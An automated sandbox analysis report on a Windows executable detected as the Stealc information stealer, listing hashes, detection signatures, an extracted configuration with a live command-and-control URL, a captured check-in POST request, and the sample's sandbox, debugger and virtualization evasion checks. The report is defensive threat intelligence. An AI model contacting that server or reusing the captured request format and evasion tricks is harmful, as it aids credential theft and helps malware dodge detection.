Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522481
MD5:f74ed5926c551ea89e49d964e729e736
SHA1:115d45e11d815a3773f95b401ac64711c3a3e99c
SHA256:c978352670126322d013cb1afb3b8ce7bfcc1f0a39765f5dead460dc7f608717
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F74ED5926C551EA89E49D964E729E736)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6996JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6996JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.5e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T08:57:57.444979+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.5e0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 41%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_005EC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_005E7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_005E9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_005E9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005F8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_005F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005EBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005E16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_005F3EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 37 41 44 44 37 30 35 45 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"CD7ADD705E7F2148772887------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"doma------EGDGIIJJECFIDHJJKKFC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_005E6280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 37 41 44 44 37 30 35 45 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"CD7ADD705E7F2148772887------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"doma------EGDGIIJJECFIDHJJKKFC--
                Source: file.exe, 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1699870972.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1699870972.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpLI
                Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpTI
                Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpXI
                Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A40970_2_009A4097
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009010830_2_00901083
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008778F40_2_008778F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CF1300_2_009CF130
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B312B0_2_009B312B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AEA3B0_2_009AEA3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AAB7F0_2_009AAB7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AFCB50_2_009AFCB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7C090_2_009A7C09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AC5970_2_009AC597
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A2D7F0_2_009A2D7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099EF150_2_0099EF15
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005E45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xxhfjhyx ZLIB complexity 0.9949629934210527
                Source: file.exe, 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_005F9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_005F3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3PF0Q0DR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 41%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1868800 > 1048576
                Source: file.exeStatic PE information: Raw size of xxhfjhyx is bigger than: 0x100000 < 0x1a2000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.5e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxhfjhyx:EW;wyglidst:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxhfjhyx:EW;wyglidst:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005F9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d779e should be: 0x1cc351
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xxhfjhyx
                Source: file.exeStatic PE information: section name: wyglidst
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008424E3 push eax; mov dword ptr [esp], ebp0_2_00843081
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push eax; mov dword ptr [esp], ecx0_2_009A409C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push ebx; mov dword ptr [esp], ebp0_2_009A410A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push ebp; mov dword ptr [esp], 00000000h0_2_009A41B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push eax; mov dword ptr [esp], ecx0_2_009A41D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 3F9657F0h; mov dword ptr [esp], edx0_2_009A4246
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push eax; mov dword ptr [esp], esi0_2_009A42BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 7F6A7E3Fh; mov dword ptr [esp], ecx0_2_009A42FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 65842D1Eh; mov dword ptr [esp], ecx0_2_009A430F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push eax; mov dword ptr [esp], ebx0_2_009A4372
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push ebp; mov dword ptr [esp], esi0_2_009A4439
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 3ACBF577h; mov dword ptr [esp], esi0_2_009A4464
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push ebx; mov dword ptr [esp], esi0_2_009A44B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push ebp; mov dword ptr [esp], ecx0_2_009A44E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 3746E57Bh; mov dword ptr [esp], eax0_2_009A44E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 3A6A8B04h; mov dword ptr [esp], edx0_2_009A457C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 685F4E86h; mov dword ptr [esp], edi0_2_009A458F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push ebx; mov dword ptr [esp], 2B5B7000h0_2_009A4593
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 0B66EDBCh; mov dword ptr [esp], esi0_2_009A460C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 2DD5F368h; mov dword ptr [esp], ebp0_2_009A465E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 28BA6B96h; mov dword ptr [esp], ecx0_2_009A46D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 2FC994B9h; mov dword ptr [esp], ebx0_2_009A4706
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 3B8B58E3h; mov dword ptr [esp], edx0_2_009A476E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 5F4CFEE7h; mov dword ptr [esp], eax0_2_009A4777
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push ebp; mov dword ptr [esp], 3F446FD1h0_2_009A477B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 6C925936h; mov dword ptr [esp], eax0_2_009A4831
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 52BCE630h; mov dword ptr [esp], ecx0_2_009A48A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 145A81CCh; mov dword ptr [esp], ebp0_2_009A48CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 11260941h; mov dword ptr [esp], edx0_2_009A48E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push esi; mov dword ptr [esp], eax0_2_009A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4097 push 20C63A96h; mov dword ptr [esp], ebx0_2_009A4959
                Source: file.exeStatic PE information: section name: xxhfjhyx entropy: 7.954667579008987

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005F9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13572
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7D63 second address: 9B7D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7D67 second address: 9B7D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F74491B01D6h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F74491B01D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7EC4 second address: 9B7ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7ECB second address: 9B7EFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F74491B01E3h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jc 00007F74491B01D6h 0x00000010 jns 00007F74491B01D6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a je 00007F74491B01D8h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B803A second address: 9B8040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B81A2 second address: 9B81AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F74491B01D6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B81AE second address: 9B81C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8347 second address: 9B834F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA762 second address: 9BA76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
